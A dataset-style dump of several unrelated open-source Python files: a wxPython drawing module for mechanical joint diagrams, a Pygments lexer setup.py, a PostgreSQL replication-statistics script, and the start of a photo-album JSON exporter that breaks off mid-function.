lien[1] = (lien[1][0], 2 * zoneMtg.milieuY - lien[1][1])
tracerFleche()
#############################################################################
def tracerChaineAct(self, dc, zoneMtg, sens):
""" Trace une chaine d'action dans <dc> """
lstLignes = self.chaineAct[sens].lstLignes
def fleche(sens, pt):
            # Arrow tip
s = sens*2-1
lf, ef = 10, 5
return [(pt.x - s*4, pt.y),(pt.x + s*lf, pt.y+lf), (pt.x + s*lf, pt.y-lf)]
        # Thickness in pixels
epaisseur = 4
        # A different color for each direction
if sens == 0:
coul = "red"
dc.SetBrush(wx.RED_BRUSH)
else:
coul = "blue"
dc.SetBrush(wx.BLUE_BRUSH)
dc.BeginDrawing()
        # Draw the chains
for ligne in lstLignes:
ligneBas = []
# impair = True
            # Bottom chain ...
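            # (each point below is mirrored about the horizontal axis milieuY)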
for p in ligne:
ligneBas.append(wx.Point(p[0],zoneMtg.milieuY - (p[1] - zoneMtg.milieuY)))
# if impair:
# ligneBas .append(c)
# else:
# ligneBas.append()
# impair = not impair
lignes = [ligne,ligneBas]
for l in lignes:
dc.SetPen(wx.Pen(coul, 5))
dc.DrawSpline(l)
dc.SetPen(wx.Pen(coul, 1))
dc.DrawPolygon(fleche(sens, l[len(l)-1]), fillStyle = wx.WINDING_RULE)
dc.EndDrawing()
###################################################################################################################
###################################################################################################################
class ListeActive(wx.Panel):
def __init__(self, parent, listeNom, bouton, actions = None, wrap = 20):
self.coul = wx.NamedColour("PINK")
wx.Panel.__init__(self, parent, -1 )
self.SetBackgroundColour(self.coul)
# box = wx.BoxSizer(wx.VERTICAL)
sizer = wx.GridBagSizer(0,0)
self.parent = parent
self.bouton = bouton
# self.nbObs = len(listeNom['lst'])
StyleText["Gras"].applique(self)
txt = StaticTextWrapped(self, -1, listeNom['mess'])
# txt.Wrap(wrap)
# box.Add(txt, 0, wx.ALIGN_LEFT|wx.ALL, 10)
sizer.Add(txt, (0,0), (1,2), flag = wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border = 4)
self.lBox = []
StyleText["Normal"].applique(self)
l = 1
for choix in listeNom['lst']:
box = wx.CheckBox(self, l-1, "")#size = (-1,-1), # 18*len(listeNom['lst'])),
# choices = listChoix,
# style = wx.LB_MULTIPLE|wx.LB_NEEDED_SB)
self.lBox.append(box)
txt = wx.StaticText(self, -1, choix)
# box.Add(self.lb, 0, wx.ALIGN_LEFT|wx.EAST|wx.WEST|wx.SOUTH, 10)
sizer.Add(box, (l,0), flag = wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL|wx.ALL, border = 2)
sizer.Add(txt, (l,1), flag = wx.ALIGN_LEFT|wx.ALIGN_CENTER_VERTICAL|wx.ALL, border = 2)
# self.lb.Fit()
# txt.SetLabel(wordwrap(txt.GetLabel(), lb.GetSize()[0],wx.ClientDC(self)))
# lb.Check(wx.NOT_FOUND)
self.Bind(wx.EVT_CHECKBOX, self.EvtListBox, box)
l += 1
parent.Bind(wx.EVT_SIZE, self.OnSize)
# self.action = action
self.SetSizerAndFit(sizer)
# self.FitInside()
def SymboleDevelop(taille):
bmp = wx.EmptyBitmap(taille, 10)
dc = wx.MemoryDC(bmp)
dc.SetBackground(wx.Brush(wx.Colour(255,255,254))) #wx.TRANSPARENT_BRUSH)
dc.Clear()
dc.SetPen(wx.Pen("PINK", 0))
dc.SetBrush(wx.Brush(self.coul))
poly = ((taille/2, 0),(0,10),(taille,10))
dc.DrawPolygon(poly, fillStyle = wx.WINDING_RULE)
img = wx.ImageFromBitmap(bmp)
img.SetMaskColour(255,255,254)
img.SetMask(True)
bmp = wx.BitmapFromImage(img)
return bmp
self.symboleDevelop = wx.StaticBitmap(parent, -1, SymboleDevelop(bouton.GetSize()[0]))
self.Montrer(False)
###################################################
def OnSize(self, event):
# print "Resize Liste Active",# self.GetSize(),
self.SetSize(wx.Size(self.parent.GetClientSize().GetWidth(),-1))
# print self.GetSize()
event.Skip()
# self.FitInside()
###################################################
def EvtListBox(self, event = None, num = None):
if num is not None: n = num
else: #n = event.GetSelection()
n = event.GetId()
# print n
if hasattr(self.bouton, "typeAction"):
action = self.lBox[n].IsChecked()
if self.bouton.tag[4] <> "R":
surBrill = False
else:
surBrill = True
#            print "Assembly obstacle :",n, action
self.parent.parent.montrerCollision(self.bouton.lstObs, n,
palier = self.bouton.tag[7],
action = action, surBrill = surBrill)
# print n
###################################################
def Montrer(self, etat):
#        print "show", self.GetId(),"==>", etat,
if etat:
self.Show()
self.symboleDevelop.Show()
else:
self.Hide()
self.symboleDevelop.Hide()
for lb in self.lBox:
if lb.IsChecked():
lb.SetValue(False)
                self.EvtListBox(num = lb.GetId())
# self.parent.Layout()
self.parent.Refresh()
# self.Update()
# self.parent.Fit()
class StaticTextWrapped(wx.StaticText):
""" A StaticText-like widget which implements word wrapping. """
def __init__(self, *args, **kwargs):
wx.StaticText.__init__(self, *args, **kwargs)
# store the initial label
self.__label = super(StaticTextWrapped, self).GetLabel()
self.marge = 8
# listen for sizing events
self.Bind(wx.EVT_SIZE, self.OnSize)
self.GetParent().Bind(wx.EVT_SIZE, self.OnParentSize)
def SetWrapFact(self, WrapFact):
self.WrapFact = WrapFact
def SetLabel(self, newLabel):
"""Store the new label and recalculate the wrapped version."""
self.__label = newLabel
self.__wrap()
def GetLabel(self):
"""Returns the label (unwrapped)."""
return self.__label
def __wrap(self):
"""Wraps the words in label."""
words = self.__label.split()
lines = []
# get the maximum width (that of our parent)
max_width = self.GetParent().GetVirtualSizeTuple()[0]-self.marge
        # Apply a factor in case there are several columns of text
if hasattr(self, "WrapFact"):
max_width = max_width/self.WrapFact
index = 0
current = []
for word in words:
current.append(word)
if self.GetTextExtent(" ".join(current))[0] > max_width:
del current[-1]
lines.append(" ".join(current))
current = [word]
# pick up the last line of text
lines.append(" ".join(current))
# set the actual label property to the wrapped version
super(StaticTextWrapped, self).SetLabel("\n".join(lines))
# refresh the widget
# self.Update()
self.Refresh()
def OnSize(self, event):
# dispatch to the wrap method which will
# determine if any changes are needed
self.__wrap()
def OnParentSize(self, event):
txt = self.__label[:6]+"..."+self.__label[-6:]
# print txt.encode('cp437','replace'),
self.__wrap()
# w,h = self.GetParent().GetClientSize()
# w += -8
# self.SetSize((w,h))#self.GetSize()[1]))
# print self.GetSize()
event.Skip()
#class StaticTextWrapped(wx.StaticText):
# def __init__(self, *arg , **kwarg):
# wx.StaticText.__init__(self, *arg , **kwarg)
## self.parent = self.GetParent()
# self.orgtxt = self.GetLabel()
# self.orgSiz = self.GetSize()[0]
# self.GetParent().Bind(wx.EVT_SIZE, self.OnSize)
#
# def OnSize(self, event = None):
## print "Resize StaticTextWraped",self.GetId(), "\t"
# sz = self.GetParent().GetClientSize()[0]-8
## sz = event.GetEventObject().GetSize()[0]
# self.SetLabel(self.orgtxt)
## self.SetLabel(self.GetLabel().replace('\n',' '))
## print "taille textwrapped", sz
# if sz < self.GetSize()[0]:
# self.Wrap(sz)
# self.Update()
## print self.GetLabel().encode('cp437','replace'), self.GetSize()
# self.GetParent().Refresh()
# self.GetParent().Update()
# self.GetParent().Update()
# self.GetParent().Refresh()
# event.Skip()
class SchemaStructure():
def __init__(self):
self.liaisons = {"G" : None,
"D" : None}
def determiner(self, mtg, ddlSupprimes):
        # Degrees of freedom removed by each bearing support
        # 0 : none
# 1 : x+
# 2 : x-
# 4 : y
        # 8 : n (rotation about z)
#        print "Determining the structure", ddlSupprimes
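        # Example: ddlSuppr = 1+2+4 = 7 (x+, x-, y) maps to "Rotule_" below,
        # while 8+1 = 9 (rotation locked plus x+) maps to "Pivot".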
#
        # Assign a standard joint to each bearing support
#
for cote, ddlSuppr in ddlSupprimes.items():
if ddlSuppr & 8 == 8:
if ddlSuppr & 1 == 1 or ddlSuppr & 2 == 2:
self.liaisons[cote] = "Pivot"
else:
self.liaisons[cote] = "PivotGliss"
elif ddlSuppr & 4 == 4:
if ddlSuppr & 1 == 1 and ddlSuppr & 2 == 2:
self.liaisons[cote] = "Rotule_"
elif ddlSuppr & 1 == 1:
self.liaisons[cote] = "RotuleG"
elif ddlSuppr & 2 == 2:
self.liaisons[cote] = "RotuleD"
else:
self.liaisons[cote] = "LinAnn"
else:
if ddlSuppr & 1 == 1 and ddlSuppr & 2 == 2:
self.liaisons[cote] = "AppPlan_"
elif ddlSuppr & 1 == 1:
self.liaisons[cote] = "AppPlanG"
elif ddlSuppr & 2 == 2:
self.liaisons[cote] = "AppPlanD"
else:
self.liaisons[cote] = "Aucune"
# print " ",self.liaisons
def panel(self, parent):
pnl = wx.Panel(parent, -1)
return pnl
def bitmap(self, charges = None):
#        print "Loads :", charges
Ycentres = 30
Xcentres = {"G" : 50,
"D" : 150}
couleurBati = wx.NamedColour("GOLD")
couleurArbr = wx.BLUE
couleurOk = wx.NamedColour("FOREST GREEN")
couleurNo = wx.RED
epaiss = 3
epaisCharg = 17
penBati = wx.Pen(couleurBati, epaiss)
penArbr = wx.Pen(couleurArbr, epaiss)
penOk = wx.Pen(couleurOk, epaisCharg)
penNo = wx.Pen(couleurNo, epaisCharg)
penOk.SetCap(wx.CAP_BUTT)
penNo.SetCap(wx.CAP_BUTT)
# penOk = wx.Pen(couleurOk, 1)
# penNo = wx.Pen(couleurNo, 1)
DimLiaison = 10
def dessinerBati(dc, cote, decaler = 0):
dc.SetPen(penBati)
if cote == "G":
s = -1
else:
s = 1
dc.DrawLine(Xcentres[cote]+s*decaler*DimLiaison*2, Ycentres+DimLiaison*2-decaler*DimLiaison*2,
Xcentres[cote]+s*decaler*DimLiaison*2, Ycentres+DimLiaison*4)
dc.DrawLine(Xcentres[cote]-DimLiaison*2+s*decaler*DimLiaison*2, Ycentres+DimLiaison*4,
Xcentres[cote]+DimLiaison*2+s*decaler*DimLiaison*2, Ycentres+DimLiaison*4)
if decaler <> 0:
dc.DrawLine(Xcentres[cote]+s*decaler*DimLiaison*2, Ycentres,
Xcentres[cote]+s*decaler*DimLiaison/2, Ycentres)
for i in range(5):
dc.DrawLine(Xcentres[cote]-DimLiaison*2+i*DimLiaison+s*decaler*DimLiaison*2, Ycentres+DimLiaison*4,
Xcentres[cote]-DimLiaison*2+(i+1)*DimLiaison+s*decaler*DimLiaison*2, Ycentres+DimLiaison*5)
def dessinerArbr(dc, liaisons = None):
dc.SetPen(penArbr)
decal = [0,0]
if liaisons is not None:
for s in [0,1]:
if liaisons[s] == "AppPlan" or liaisons[s][:-1] == "AppPlan":
decal[s] = (1-2*s) * DimLiaison/2
elif liaisons[s] == "Pivot" or liaisons[s] == "PivotGliss":
decal[s] = (1-2*s) * DimLiaison*5
dc.DrawLine(Xcentres["G"]+DimLiaison+decal[1], Ycentres,
Xcentres["D"]-DimLiaison+decal[0], Ycentres)
def dessinerLiaison(dc, liaison, cote):
if liaison[:-1] == "AppPlan":
if cote == "G":
penB, penA = penBati, penArbr
else:
penA, penB = penBati, penArbr
dc.SetPen(penB)
dc.DrawLine(Xcentres[cote]-DimLiaison/2, Ycentres-DimLiaison*2,
Xcentres[cote]-DimLiaison/2, Ycentres+DimLiaison*2)
dc.SetPen(penA)
dc.DrawLine(Xcentres[cote]+DimLiaison/2, Ycentres-DimLiaison*2,
Xcentres[cote]+DimLiaison/2, Ycentres+DimLiaison*2)
elif liaison[:-1] == "Rotule" or liaison == "LinAnn":
dc.SetPen(penBati)
dc.SetBrush(wx.TRANSPARENT_BRUSH)
if liaison[-1:] == "G":
dc.DrawArc(Xcentres[cote], Ycentres+DimLiaison*2,
Xcentres[cote], Ycentres-DimLiaison*2,
Xcentres[cote], Ycentres)
elif liaison[-1:] == "D":
dc.DrawArc(Xcentres[cote], Ycentres-DimLiaison*2,
Xcentres[cote], Ycentres+DimLiaison*2,
Xcentres[cote], Ycentres)
elif liaison == "LinAnn":
dc.DrawRectangle(Xcentres[cote]-DimLiaison*2, Ycentres-DimLiaison/4,
DimLiaison*4, DimLiaison*2+DimLiaison/4)
else:
if cote == "G":
s = -1
else:
s = 1
dc.DrawArc(Xcentres[cote]-s*DimLiaison, Ycentres+s*(DimLiaison*7/4),
Xcentres[cote]-s*DimLiaison, Ycentres-s*(DimLiaison*7/4),
Xcentres[cote], Ycentres)
dc.SetBrush(dc.GetBackground())
dc.SetPen(penArbr)
dc.DrawCircle(Xcentres[cote], Ycentres, DimLiaison)
elif liaison == "Pivot" or liaison == "PivotGliss":
dc.SetPen(penBati)
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRectangle(Xcentres[cote]-DimLiaison*2, Ycentres-DimLiaison*3/2,
DimLiaison*4, DimLiaison*3)
dc.DrawLine(Xcentres[cote], Ycentres+DimLiaison*3/2,
Xcentres[cote], Ycentres+2*DimLiaison)
dc.SetBrush(dc.GetBackground())
dc.SetPen(penArbr)
if liaison == "Pivot":
dc.DrawLine(Xcentres[cote]-DimLiaison*3, Ycentres-DimLiaison,
Xcentres[cote]-DimLiaison*3, Ycentres+DimLiaison)
dc.DrawLine(Xcentres[cote]+DimLiaison*3, Ycentres-DimLiaison,
Xcentres[cote]+DimLiaison*3, Ycentres+DimLiaison)
# dc.SetBrush(wx.TRANSPARENT_BRUSH)
def dessinerFlecheCharge(dc, cote, typeCharge, resiste):
# bm = wx.EmptyBitmap(bmp.GetWidth(), bmp.GetHeight())
# dc = DCPlus(bm)
# dc.Clear()
tanA_ = 1
dc.SetLogicalFunction(wx.AND)
if resiste:
dc.SetPen(penOk)
else:
dc.SetPen(penNo)
if typeCharge == 1:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*3, Ycentres,
Xcentres[cote]+DimLiaison*3, Ycentres,
style = 2, tanF = tanA_)
elif typeCharge == 2:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*3, Ycentres,
Xcentres[cote]+DimLiaison*3, Ycentres,
style = 1, tanF = tanA_)
elif typeCharge == 3:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*3, Ycentres,
Xcentres[cote]+DimLiaison*3, Ycentres,
style = 3, tanF = tanA_)
elif typeCharge == 4:
dc.DrawLineArrow(Xcentres[cote], Ycentres-DimLiaison*3,
Xcentres[cote], Ycentres+DimLiaison*3,
style = 1, tanF = tanA_)
elif typeCharge == 5:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*2, Ycentres+DimLiaison*2,
Xcentres[cote]+DimLiaison*2, Ycentres-DimLiaison*2,
style = 2, tanF = tanA_)
elif typeCharge == 6:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*2, Ycentres+DimLiaison*2,
Xcentres[cote]+DimLiaison*2, Ycentres-DimLiaison*2,
style = 1, tanF = tanA_)
elif typeCharge == 7:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*2, Ycentres+DimLiaison*2,
Xcentres[cote]+DimLiaison*2, Ycentres-DimLiaison*2,
style = 3, tanF = tanA_)
dc.SetLogicalFunction(wx.COPY)
        # Combine the images
bmp = wx.EmptyBitmap(200, 100)
memdc = DCPlus(bmp)
memdc.SetBackground(wx.Brush(wx.Colour(255,255,254))) #wx.TRANSPARENT_BRUSH)
memdc.Clear()
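        # The off-white background colour (255,255,254) doubles as the
        # transparency key passed to SetMaskColour() further down.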
# memdc.SetBrush(wx.TRANSPARENT_BRUSH)
memdc.SetBrush(memdc.GetBackground())
for cote, l in self.liaisons.items():
if l <> "Aucune":
if l == "AppPlan" or l[:-1] == "AppPlan":
dec = 1
else:
dec = 0
dessinerBati(memdc, cote, dec)
dessinerLiaison(memdc, l, cote)
dessinerArbr(memdc, self.liaisons.values())
for cote, l in self.liaisons.items():
if l <> "Aucune":
if charges is not None:
dessinerFlecheCharge(memdc, cote, charges[cote][0],charges[cote][1])
memdc.SelectObject(wx.NullBitmap)
img = wx.ImageFromBitmap(bmp)
img.SetMaskColour(255,255,254)
img.SetMask(True)
bmp = wx.BitmapFromImage(img)
return bmp
|
gpl-3.0
| -3,650,001,449,097,475,000 | 38.288287 | 150 | 0.456764 | false |
liluo/pygments-github-lexers
|
setup.py
|
1
|
1241
|
#!/usr/bin/python
from setuptools import setup
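# Registering the lexers under the "pygments.lexers" entry-point group below
# is how Pygments discovers third-party lexers installed as plugins.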
setup(name='pygments-github-lexers',
version='0.0.5',
description='Pygments Github custom lexers.',
keywords='pygments github lexer',
license='BSD',
author='Liluo',
author_email='i@liluo.org',
url='https://github.com/liluo/pygments-github-lexers',
packages=['pygments_github_lexers'],
install_requires=['pygments>=2.0.2'],
entry_points='''[pygments.lexers]
Dasm16Lexer=pygments_github_lexers:Dasm16Lexer
PuppetLexer=pygments_github_lexers:PuppetLexer
AugeasLexer=pygments_github_lexers:AugeasLexer
TOMLLexer=pygments_github_lexers:TOMLLexer
SlashLexer=pygments_github_lexers:SlashLexer''',
classifiers=[
'Environment :: Plugins',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
],)
|
bsd-2-clause
| 6,308,187,781,502,029,000 | 34.457143 | 73 | 0.596293 | false |
uptimejp/postgres-toolkit
|
postgres_toolkit/pt_replication_stat.py
|
1
|
3712
|
#!/usr/bin/env python
# coding: UTF-8
# pt-replication-stat
#
# Copyright(c) 2015-2018 Uptime Technologies, LLC.
import copy
import getopt
import os
import sys
import time
import PsqlWrapper
import log
class ReplicationStatistics:
def __init__(self, psql, debug=False):
self.debug = debug
self.psql = psql
self.header = None
def get(self):
if self.psql.get_version() == 9.0:
log.error("PostgreSQL 9.0 is not supported.")
sys.exit(1)
pidcol = "pid"
if self.psql.get_version() == 9.1:
pidcol = "procpid"
query = ' \
select null as "PID", \
null as "NAME", \
null as "HOST", \
null as "PORT", \
\'local\' as "STATE", \
pg_current_xlog_insert_location() as "SENT", \
pg_current_xlog_location() as "WRITTTEN", \
null as "FLUSHED", \
null as "REPLAYED", \
null as "PRI", \
\'master\' as "MODE" \
union all \
select %s, \
application_name as name, \
client_addr as addr, \
client_port as port, \
state, \
sent_location as sent, \
write_location as write, \
flush_location as flush, \
replay_location as reply, \
sync_priority as pri, \
sync_state as mode \
from pg_stat_replication \
;' % pidcol
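        # Note: pg_current_xlog_*() and the *_location columns are the
        # pre-PostgreSQL-10 names (renamed to pg_current_wal_*() / *_lsn
        # in version 10).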
log.debug(query)
        rs = self.psql.execute_query(query)
if rs is None or len(rs) == 0:
log.error("Cannot retreive statitics from the server. "
"Connecting to wrong server?")
sys.exit(1)
else:
            self.psql.print_result(rs)
print("")
return True
def usage():
print '''
Usage: {0} [option...] [delay [count]]
Options:
-h, --host=HOSTNAME Host name of the postgres server
-p, --port=PORT Port number of the postgres server
-U, --username=USERNAME User name to connect
-d, --dbname=DBNAME Database name to connect
--help Print this help.
'''.format(os.path.basename(sys.argv[0]))
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:p:U:d:",
["help", "debug", "host=", "port=",
"username=", "dbname="])
except getopt.GetoptError, err:
print str(err)
usage()
sys.exit(2)
host = None
port = None
username = None
dbname = None
debug = None
for o, a in opts:
if o in ("-h", "--host"):
host = a
elif o in ("-p", "--port"):
port = int(a)
elif o in ("-U", "--username"):
username = a
elif o in ("-d", "--dbname"):
dbname = a
elif o in ("--debug"):
log.setLevel(log.DEBUG)
debug = True
elif o in ("--help"):
usage()
sys.exit(0)
else:
print "unknown option: " + o + "," + a
sys.exit(1)
delay = None
count = None
if len(args) >= 1:
delay = int(args[0])
if len(args) >= 2:
count = int(args[1])
p = PsqlWrapper.PsqlWrapper(host=host, port=port,
username=username,
dbname=dbname, debug=debug)
i = 0
while True:
os.system("date")
stat = ReplicationStatistics(p, debug=debug)
stat.get()
i = i + 1
if delay is None:
break
if count is not None and i >= count:
break
try:
time.sleep(delay)
except KeyboardInterrupt, err:
log.info("Terminated.")
break
sys.exit(0)
|
gpl-2.0
| 5,849,843,459,574,883,000 | 22.643312 | 70 | 0.493265 | false |
eklinger-UofA/3DOrthotics
|
orthotics_project/orthotics_project/settings.py
|
1
|
2474
|
"""
Django settings for orthotics_project project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8f4!@*b0wr4u0mfc1d007l&s@w^%2t$!jx4w-vv_z2uc&i+lw)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Template stuff
TEMPLATE_DEBUG = True
TEMPLATE_PATH = os.path.join(BASE_DIR, 'templates')
TEMPLATE_DIRS = (
# Put strings here like "/home/html/django_templates"
# Don't forget to use absolute paths, not relative paths
TEMPLATE_PATH,
)
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'clients',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'orthotics_project.urls'
WSGI_APPLICATION = 'orthotics_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_PATH = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
# TODO add this back, just missing the location of default django static files
# makes the admin page look crappy if this is included now
STATICFILES_DIRS = (
STATIC_PATH,
)
|
apache-2.0
| -7,248,261,660,948,498,000 | 24.244898 | 78 | 0.722312 | false |
umitproject/openmonitor-desktop-agent
|
umit/icm/agent/core/Updater.py
|
1
|
3742
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 S2S Network Consultoria e Tecnologia da Informacao LTDA
#
# Author: Luis A. Bastiao Silva <luis.kop@gmail.com>
# Tianwei Liu <liutianweidlut@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import os

# TMP_DIR, VERSION, compare_version, higher_version and g_db_helper are
# assumed to be provided by the agent's shared configuration/global modules.
from umit.icm.agent.utils.FileDownloader import FileDownloader
from umit.icm.agent.Application import theApp
from umit.icm.agent.logger import g_logger
def download_update(url=None,check_code = None, version=None):
"""
download and update
"""
downloader = FileDownloader(url,
os.path.join(TMP_DIR, "icm-agent_" + str(version) +".tar.gz"))
if check_code == "" or check_code == None :
check_code = 0;
else:
check_code = check_code
downloader.addCallback(update_agent,
str(version),
check_code)
downloader.start()
def auto_check_update(auto_upgrade=None):
defer_ = theApp.aggregator.check_version()
defer_.addCallback(handle_auto_check_update,auto_upgrade)
defer_.addErrback(handle_auto_errback)
return defer_
def handle_auto_check_update(message,auto_upgrade):
""""""
if message is None:
return
if compare_version(str(message.versionNo),VERSION) == higher_version:
g_logger.info("New version arrive in Check" )
if auto_upgrade == False:
from umit.icm.agent.gui.Notifications import NotificationUpdate,new_release_mode,report_mode
t = NotificationUpdate(mode=new_release_mode,text="test",timeout=15000)
else:
from umit.icm.agent.gui.Notifications import NotificationUpdate,auto_upgrade_mode,report_mode
t = NotificationUpdate(mode=auto_upgrade_mode,text="test",timeout=30000)
#software update automatically
download_update(url=message.downloadURL,version=message.versionNo,check_code=None)
else:
g_logger.info("Current version is the newest in Check" )
def handle_auto_errback(failure):
""""""
g_logger.error("auto check error:%s" % str(failure))
def insert_update_item_in_db(record):
""""""
sql_commit = "insert into updates (version,news_date,software_name, "\
"description, download_url, is_update, check_code ) "\
"values ('%s', '%s' , '%s', '%s','%s', '%s', '%s') " % \
(record["version"],
record["news_date"],
record["software_name"],
record["description"],
record["download_url"],
record["is_update"],
record["check_code"])
g_db_helper.execute(sql_commit)
g_db_helper.commit()
g_logger.debug("insert a new record(%s) into updates of DB." % sql_commit)
def check_update_item_in_db(version):
""""""
rs = g_db_helper.select("select * from updates where version = '%s' " % version)
if len(rs) == 0:
return False
else:
return True
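# Illustrative sketch (not part of the original module): a caller would
# typically kick off the version check from the agent's startup code and
# let the returned deferred drive the rest of the pipeline.
def _example_start_update_check():
    deferred = auto_check_update(auto_upgrade=False)
    deferred.addCallback(lambda _: g_logger.info("Update check dispatched"))
    return deferred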
|
gpl-2.0
| -5,635,735,183,562,564,000 | 37.183673 | 105 | 0.632015 | false |
utunga/hashmapd
|
projects/mnist/get_single_coord.py
|
1
|
1837
|
import os, sys, getopt
import numpy, time, cPickle, gzip, PIL.Image
import csv
def get_git_home():
testpath = '.'
    while '.git' not in os.listdir(testpath) and os.path.abspath(testpath) != '/':
        testpath = os.path.sep.join(('..', testpath))
    if os.path.abspath(testpath) != '/':
return os.path.abspath(testpath)
else:
raise ValueError, "Not in git repository"
HOME = get_git_home()
sys.path.append(HOME)
from hashmapd.load_config import LoadConfig, DefaultConfig
from hashmapd.tsne import TSNE
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-f", "--file", dest="config", default="config",
help="Path of the config file to use")
(options, args) = parser.parse_args()
cfg = LoadConfig(options.config)
codes_file = cfg.output.codes_file
coords_file = cfg.output.coords_file
codes = numpy.genfromtxt(codes_file, dtype=numpy.float32, delimiter=',')
codes = codes[:,1:]
tsne = TSNE(perplexity=cfg.tsne.perplexity, desired_dims=cfg.tsne.desired_dims)
tsne.initialize_with_codes(codes)
#tsne.fit(iterations=cfg.tsne.initial_fit_iterations)
# should already be fit.
tsne.save_coords_to_file(coords_file)
#tsne.load_from_file(coords_file,codes_file)
#tsne.fit(iterations=2)
#test_code = [0.1350030452,0.4128168225,0.0014129921,0.7547346354,0.0068102819,0.6216894388,0.9996289015,0.8628810048,0.0004052414,0.0012938380,0.9998107553,0.0000006208,0.2459984124,0.0001938931,0.0103854276,0.0001564398,0.0000000090,0.9995579720,0.9649902582,0.0000025402,0.9946812987,0.9264854193,0.9999329448,0.0095445570,0.0054685692,0.9955748916,0.9433483481,0.0002042586,0.0430774689,0.7664549351]
#tsne.get_coord_for_code(test_code, iterations =2)
|
agpl-3.0
| 2,932,408,788,694,564,400 | 38.934783 | 408 | 0.697333 | false |
rmnl/htg
|
htg/classes/json.py
|
1
|
14532
|
# coding: utf-8
import click
import datetime
import os
import peewee
import pickle
import string
from ..models import Album
from ..models import AlbumPicture
from ..models import Picture
from ..models import ResizedPicture
from ..utils import check_and_create_dir
from ..utils import fatal_error
from ..utils import slugify
from ..utils import to_utc_timestamp
from ..utils import write_json
class Json(object):
copy_failed_for = []
files_to_copy = []
templates = []
anchors = []
def __init__(self, config, output_dir=None):
self.config = config
self.output_dir = output_dir if output_dir else config.json_data_dir
def _anchor(self, text):
def _a(anchor, counter):
return '%s-%s' % (anchor, counter) if counter else anchor
anchor = slugify(text)
counter = 0
while _a(anchor, counter) in self.anchors:
counter += 1
return _a(anchor, counter)
def _generate_albums_json(self):
abs_dir = os.path.join(self.output_dir, 'albums')
if not check_and_create_dir(abs_dir, create=True):
return None
album_titles, album_slugs, album_list = [], [], []
albums = Album.select().where(Album.hidden == False)\
.order_by(Album.start_date.desc())
with click.progressbar(albums, label="Albums exported: ",
length=albums.count(), show_pos=True) as bar:
for album in bar:
pics = None
content = []
meta = pickle.loads(album.meta) if album.meta else {}
if album.from_dir and 'name_desc' == meta.get('order_by', ''):
pics = album.pictures.order_by(Picture.file_name.desc())
elif album.from_dir and 'date_desc' == meta.get('order_by', ''):
pics = album.pictures.order_by(Picture.sort_date.desc())
elif album.from_dir and 'date_asc' == meta.get('order_by', ''):
pics = album.pictures.order_by(Picture.sort_date.asc())
elif album.from_dir:
pics = album.pictures.order_by(Picture.file_name.asc())
else:
one_day = datetime.timedelta(1)
if album.end_date is None:
end_date = album.start_date + one_day
else:
end_date = album.end_date + one_day
pics = Picture.select().where(
Picture.sort_date > album.start_date,
Picture.sort_date < end_date
).order_by(Picture.sort_date.asc())
chapters = meta.get('chapters', None)
daily_titles, daily_subs = False, False
if isinstance(chapters, list):
daily_titles = False
elif chapters == 'daily' or self.config.auto_day_paragraphs:
daily_titles = True
cover = meta.get('cover', None)
if cover:
try:
cover = Picture.get(Picture.file_name == cover)\
.build_dict(self.config.resized_photos_url)
except peewee.DoesNotExist:
cover = None
def _comparable_day(date, alt=0):
if isinstance(date, datetime.date):
return int(datetime.datetime.strftime(date, "%Y%m%d"))
return alt
if pics is not None:
previous_day = 0
for pi, pic in enumerate(pics):
new_chapter = None
day = _comparable_day(pic.sort_date, previous_day)
if isinstance(chapters, list):
for c in chapters:
if c['starts'] == pic.file_name:
new_chapter = c
if new_chapter and new_chapter.get('title'):
